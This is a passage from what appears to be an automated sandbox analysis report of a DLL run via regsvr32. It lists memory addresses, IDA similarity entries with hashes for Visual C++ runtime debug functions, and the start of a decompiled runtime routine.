                                                                    0x7fef9d3ea95
                                                                    0x7fef9d3eaad
                                                                    0x7fef9d3eabd
                                                                    0x7fef9d3eada
                                                                    0x7fef9d3eaf8
                                                                    0x7fef9d3eb06
                                                                    0x7fef9d3eb11
                                                                    0x7fef9d3eb2e
                                                                    0x7fef9d3eb38
                                                                    0x7fef9d3eb43
                                                                    0x7fef9d3eb49
                                                                    0x7fef9d3eb4e
                                                                    0x7fef9d3eb5a
                                                                    0x7fef9d3eb71
                                                                    0x7fef9d3eb7a
                                                                    0x7fef9d3eb85
                                                                    0x7fef9d3eb8a
                                                                    0x7fef9d3eb97
                                                                    0x7fef9d3ebc9
                                                                    0x7fef9d3ebd8
                                                                    0x7fef9d3ebda
                                                                    0x7fef9d3ebe5
                                                                    0x7fef9d3ebff
                                                                    0x7fef9d3ec1a
                                                                    0x7fef9d3ec22
                                                                    0x7fef9d3ec27
                                                                    0x7fef9d3ec42
                                                                    0x7fef9d3ec4f
                                                                    0x7fef9d3ec5a
                                                                    0x7fef9d3ec77
                                                                    0x7fef9d3ec82
                                                                    0x7fef9d3ec8e
                                                                    0x7fef9d3ec93
                                                                    0x7fef9d3ec9c
                                                                    0x7fef9d3eca9
                                                                    0x7fef9d3ecb3
                                                                    0x7fef9d3ecb5
                                                                    0x7fef9d3ecc0
                                                                    0x7fef9d3ecc2
                                                                    0x7fef9d3eccd
                                                                    0x7fef9d3ecd4
                                                                    0x7fef9d3ece3
                                                                    0x7fef9d3ece5
                                                                    0x7fef9d3ecec
                                                                    0x7fef9d3ecf1
                                                                    0x7fef9d3ecf4
                                                                    0x7fef9d3ed06
                                                                    0x7fef9d3ed0e
                                                                    0x7fef9d3ed10
                                                                    0x7fef9d3ed1b
                                                                    0x7fef9d3ed1d
                                                                    0x7fef9d3ed22
                                                                    0x7fef9d3ed28
                                                                    0x7fef9d3ed31
                                                                    0x7fef9d3ed4c
                                                                    0x7fef9d3ed51
                                                                    0x7fef9d3ed61
                                                                    0x7fef9d3ed6d
                                                                    0x7fef9d3ed76
                                                                    0x7fef9d3ed82
                                                                    0x7fef9d3eda5

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: get_int64_arg
                                                                    • String ID: ("Incorrect format specifier", 0)$9$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                    • API String ID: 1967237116-1983305044
                                                                    • Opcode ID: 2a7d659c8e5e6b28fc7c58fcf8e8579ea91b99a8d6af850dbdc893ea63a98b90
                                                                    • Instruction ID: 6542cf9ee6a066de1e86aade3174812d6b56db97d2698e01b13d8cfaf3a7b086
                                                                    • Opcode Fuzzy Hash: 2a7d659c8e5e6b28fc7c58fcf8e8579ea91b99a8d6af850dbdc893ea63a98b90
                                                                    • Instruction Fuzzy Hash: 20F1E872A0DAC58AE7B18B55E8417AFB7E0F784346F200125E6C987AE9EB7DD440CF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$(L"String is not null terminated" && 0)$Buffer is too small$String is not null terminated$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscat_s.inl$wcscat_s
                                                                    • API String ID: 2123368286-3477667311
                                                                    • Opcode ID: b8fc4c6395d55294f14e808969fd0dde924ec27b835ffc5b45b9a86212572efe
                                                                    • Instruction ID: b03569ffd57b7167c314fdf02ed50a447cb54ce8ebbf145893a20e686b3b9740
                                                                    • Opcode Fuzzy Hash: b8fc4c6395d55294f14e808969fd0dde924ec27b835ffc5b45b9a86212572efe
                                                                    • Instruction Fuzzy Hash: BFF13832A0DB8685EBE08B19E94476EA3E0F385795F604535D6DE83BA8DF7ED044CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$(L"String is not null terminated" && 0)$Buffer is too small$String is not null terminated$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscat_s.inl$strcat_s
                                                                    • API String ID: 2123368286-1420200500
                                                                    • Opcode ID: 0735035b45f8f7c7b818c7081b0ef0632545b94255aff591ce5d43235ef3c046
                                                                    • Instruction ID: c5de73825737ff17a6e05e0685af1bba33d69fc1e3bcf908defeea2cf04d7043
                                                                    • Opcode Fuzzy Hash: 0735035b45f8f7c7b818c7081b0ef0632545b94255aff591ce5d43235ef3c046
                                                                    • Instruction Fuzzy Hash: A9F15A32A0DB8A89FBA08B14E84576EA7E0F385395FA04535D6DD43BA8DF3ED044CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~__get_printf_count_output_invalid_parameterget_int64_argwctomb_s
                                                                    • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                    • API String ID: 2560055391-3497434347
                                                                    • Opcode ID: f7e31fddf96ab2d989b429fa4fac32de28ca989592260db18f40bb78f450a6ea
                                                                    • Instruction ID: 46d09667909aa5f7b215aa93bab53907018271778d835aa8b5e6ab3fef1b3364
                                                                    • Opcode Fuzzy Hash: f7e31fddf96ab2d989b429fa4fac32de28ca989592260db18f40bb78f450a6ea
                                                                    • Instruction Fuzzy Hash: 3BC12D72A0C7C686E7B19B64E8457BEB7E4F384785F604025DAC887AA9DB7DE540CF00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: __doserrno$_invalid_parameter
                                                                    • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_lseeki64$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c
                                                                    • API String ID: 747159061-1442092225
                                                                    • Opcode ID: ef8329fd12da17d600f4f9f1cced5d5e2c2be82d60747835616dff46824e4e92
                                                                    • Instruction ID: caaad020489782614700f882d8602b34381ead5b625f1b09b5848be00580b1cf
                                                                    • Opcode Fuzzy Hash: ef8329fd12da17d600f4f9f1cced5d5e2c2be82d60747835616dff46824e4e92
                                                                    • Instruction Fuzzy Hash: 28617C72A1C646CAE7909B25EC4076E72E1F380765F604725E6ED47AF9DB7EE440CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _exit_invoke_watson_if_error_invoke_watson_if_oneof
                                                                    • String ID: Module: $(*_errno())$...$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
                                                                    • API String ID: 1778837556-2487400587
                                                                    • Opcode ID: 577a98effe66048d1b02d2ce2304ffee9433b0bc14e646f7048145a1ac209acc
                                                                    • Instruction ID: 47630d5eafba837dbe703c3de9865bf662ca48ff4c989782bbe983e1f30135bf
                                                                    • Opcode Fuzzy Hash: 577a98effe66048d1b02d2ce2304ffee9433b0bc14e646f7048145a1ac209acc
                                                                    • Instruction Fuzzy Hash: 7851C476608AC591E774DB18F8803EEB3E1F788394F604126EACD43AA9DB7ED154CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: DecodePointer$Locale$UpdateUpdate::~__invalid_parameterwctomb_s
                                                                    • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                    • API String ID: 83251219-3442986447
                                                                    • Opcode ID: 001a85c562113ca4b869716a344f10cda0261345211a969ed6127680fca34cae
                                                                    • Instruction ID: db55a7b1c5e8f8ba017cd25dadef4e5d7f369c86b420bd695ab78b9edef6402a
                                                                    • Opcode Fuzzy Hash: 001a85c562113ca4b869716a344f10cda0261345211a969ed6127680fca34cae
                                                                    • Instruction Fuzzy Hash: 49F1D87260CBC186E7B18B25E8947AEB7E4F384785F604125EACD87AA9DB7DD540CF00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(filedes) & FOPEN)$(filedes >= 0 && (unsigned)filedes < (unsigned)_nhandle)$_commit$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\commit.c
                                                                    • API String ID: 2123368286-2816485415
                                                                    • Opcode ID: a9ecfc86665cfe11dfc030c63538da66c5eec56c542ce672bdc8af4c2c9759d0
                                                                    • Instruction ID: e049fe60bfe8b909c44bc6b291fed8ca56badbc40bca4273ec712473172458ea
                                                                    • Opcode Fuzzy Hash: a9ecfc86665cfe11dfc030c63538da66c5eec56c542ce672bdc8af4c2c9759d0
                                                                    • Instruction Fuzzy Hash: 72617B71A1C6468AE7909B28EC4176E73E1F780354F608225E6DE57AF5D77EE440CF02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: __doserrno$_invalid_parameter
                                                                    • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_close$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\close.c
                                                                    • API String ID: 747159061-2992490823
                                                                    • Opcode ID: 145745de55703435efe457d343042b6d2b79a4b89ecca71574c94757b3ea27c1
                                                                    • Instruction ID: a54d4eac887ae6c515e29e2b1085f50a353430ba1ba5378d93a4f051e541eccc
                                                                    • Opcode Fuzzy Hash: 145745de55703435efe457d343042b6d2b79a4b89ecca71574c94757b3ea27c1
                                                                    • Instruction Fuzzy Hash: 38515C71A186468AE7909B29EC8176E73E2F780758F608225E6DD476F5D77EE400CF02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~__get_printf_count_output_invalid_parameterget_int64_arg
                                                                    • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                    • API String ID: 1328470723-1899493600
                                                                    • Opcode ID: f6969a0051e08e9fb172d17dbb699df528c09bf6843d3bd9f9f4304ac6550dc4
                                                                    • Instruction ID: 35246ecaaba514364cbfc4328619620b6524a9f29049ac5612c0b139108759f7
                                                                    • Opcode Fuzzy Hash: f6969a0051e08e9fb172d17dbb699df528c09bf6843d3bd9f9f4304ac6550dc4
                                                                    • Instruction Fuzzy Hash: 41C10D72A0CAC286E7B19B55E8407AFB7E0F384346F600125E6C987AE9DB7DE444CF10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocaMarkStringmalloc
                                                                    • String ID:
                                                                    • API String ID: 2352934578-0
                                                                    • Opcode ID: c62487d166d7dca86c557c7a35fedf321effa742b468bc4a62d127ec3f3969a5
                                                                    • Instruction ID: 07e98e5d3e74dc1edba9ed484819fff5a1f4d1c282268086727bfc73f0da1f11
                                                                    • Opcode Fuzzy Hash: c62487d166d7dca86c557c7a35fedf321effa742b468bc4a62d127ec3f3969a5
                                                                    • Instruction Fuzzy Hash: E8B1D73690C7818AE7A0CB5AE84476FB7E0F789754F214525EAC983BA8DB7ED444CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcsncpy_s.inl$wcsncpy_s
                                                                    • API String ID: 2123368286-322314505
                                                                    • Opcode ID: 3bb9d1a90c7c3446087a29b367bd8117c888f0c96a3fbe465b5df790d7333f4b
                                                                    • Instruction ID: 6d338823bc0f2b3e781b71aef6a49b7720da2244df946e2498ce1ac2f83d5b49
                                                                    • Opcode Fuzzy Hash: 3bb9d1a90c7c3446087a29b367bd8117c888f0c96a3fbe465b5df790d7333f4b
                                                                    • Instruction Fuzzy Hash: BE023F32A0CB8585EBF09B29E94476EA3E0F385795F604625D6DD83BE5DF3ED0848B01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: DecodePointer$Locale$UpdateUpdate::~__invalid_parameter
                                                                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                    • API String ID: 1139040907-3988320827
                                                                    • Opcode ID: 4175f3561072ab378176a1e1f92056bf5caba3e85f41217d234b1a14ff64e00d
                                                                    • Instruction ID: 3e7729e9fa2df8fbd66d26b0c41d9f273e3b14a95de5485bb8cc9613adf332ea
                                                                    • Opcode Fuzzy Hash: 4175f3561072ab378176a1e1f92056bf5caba3e85f41217d234b1a14ff64e00d
                                                                    • Instruction Fuzzy Hash: 48F1E972A0CAC18AE7A08B55E8407AFB7E0F385746F600126E6CD87AA9DB7DD444CF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl$wcscpy_s
                                                                    • API String ID: 2123368286-3300880850
                                                                    • Opcode ID: 938211b99713ed548de0de10d16fbf2c247e5ceda09f99a66501889bb82a488d
                                                                    • Instruction ID: aecfb8002ddf48ca923cbb39b51a8433fc62f52c2bad17b92f015e95501d1b82
                                                                    • Opcode Fuzzy Hash: 938211b99713ed548de0de10d16fbf2c247e5ceda09f99a66501889bb82a488d
                                                                    • Instruction Fuzzy Hash: 16C15B31A0DB8685EBB08B29E84476E63E4F385795F608235D6DD43BA9DF7ED084CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl$strcpy_s
                                                                    • API String ID: 2123368286-3045918802
                                                                    • Opcode ID: ee01400f27967885302bbfc3418a092fc70a607ac75d61aa13826b291406155b
                                                                    • Instruction ID: 2d2c21a115c33e05293010ad7c3501076a31da08f4abba68164bfd8b1e70ad26
                                                                    • Opcode Fuzzy Hash: ee01400f27967885302bbfc3418a092fc70a607ac75d61aa13826b291406155b
                                                                    • Instruction Fuzzy Hash: 9EC14D3190CB8A85EBA08B28E84436EA3E0F386794F614535D6DE43BB5DF7ED448CB11
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 15%
                                                                    			E000007FE7FEF9D3F000(long long __rcx, signed char* __rdx, long long __r8, long long __r9, long long _a8, signed char* _a16, long long _a24, long long _a32) {
                                                                    				intOrPtr _v24;
                                                                    				long long _v32;
                                                                    				intOrPtr _v36;
                                                                    				intOrPtr _v40;
                                                                    				intOrPtr _v44;
                                                                    				intOrPtr _v48;
                                                                    				intOrPtr _v52;
                                                                    				intOrPtr _v56;
                                                                    				char _v88;
                                                                    				intOrPtr _v96;
                                                                    				long long _v104;
                                                                    				void* _t80;
                                                                    				void* _t81;
                                                                    				void* _t89;
                                                                    				void* _t92;
                                                                    				intOrPtr _t102;
                                                                    				intOrPtr* _t136;
                                                                    				intOrPtr* _t137;
                                                                    				intOrPtr* _t139;
                                                                    				signed char* _t141;
                                                                    				intOrPtr* _t142;
                                                                    				intOrPtr* _t143;
                                                                    				intOrPtr* _t144;
                                                                    				intOrPtr* _t148;
                                                                    				intOrPtr* _t149;
                                                                    
                                                                    				_a32 = __r9;
                                                                    				_a24 = __r8;
                                                                    				_a16 = __rdx;
                                                                    				_a8 = __rcx;
                                                                    				if (_a16 == 0) goto 0xf9d3f031;
                                                                    				if (_a24 != 0) goto 0xf9d3f038;
                                                                    				goto 0xf9d3f31a;
                                                                    				_t136 = _a16;
                                                                    				if ( *_t136 != 0) goto 0xf9d3f066;
                                                                    				if (_a8 == 0) goto 0xf9d3f05f;
                                                                    				 *_a8 = 0;
                                                                    				goto 0xf9d3f31a;
                                                                    				0xf9d266b0();
                                                                    				_t80 = E000007FE7FEF9D26840(0,  &_v88);
                                                                    				_t137 =  *_t136;
                                                                    				if ( *((intOrPtr*)(_t137 + 0x10c)) == 1) goto 0xf9d3f0d2;
                                                                    				_t81 = E000007FE7FEF9D26840(_t80,  &_v88);
                                                                    				if ( *((intOrPtr*)( *_t137 + 0x10c)) == 2) goto 0xf9d3f0d2;
                                                                    				_t139 = L"_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2";
                                                                    				_v104 = _t139;
                                                                    				r9d = 0;
                                                                    				r8d = 0x47;
                                                                    				0xf9d2b3b0();
                                                                    				if (_t81 != 1) goto 0xf9d3f0d2;
                                                                    				asm("int3");
